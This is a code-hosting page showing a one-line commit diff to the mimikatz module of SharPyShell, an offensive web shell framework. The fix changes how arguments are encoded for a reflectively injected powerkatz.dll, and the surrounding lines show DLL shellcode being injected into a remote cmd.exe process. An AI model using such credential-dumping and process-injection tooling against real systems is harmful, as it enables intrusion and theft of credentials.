Projects STRLCPY SharPyShell Commits 0a0462ff
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■
    modules/mimikatz.py
    skipped 126 lines
    127 127   dll_name = 'powerkatz.dll'
    128 128   exported_function_name = 'powershell_reflective_mimikatz'
    129 129   log_file = self._module_settings['env_directory'] + '\\' + random_generator()
    130  - exported_function_data = '"log ' + log_file + '" ' + custom_command
     130 + exported_function_data = str.encode('"log ' + log_file + '" ' + custom_command + '\x00', 'utf-16-le')
    131 131   if username == '':
    132 132   print ('\n\nInjecting converted DLL shellcode into remote process...')
    133 133   response = self.inject_dll_srdi_module_object.run([dll_name, 'remote_virtual', 'cmd.exe', '60000', '{}',
    skipped 34 lines
Please wait...
Page is in error, reload to recover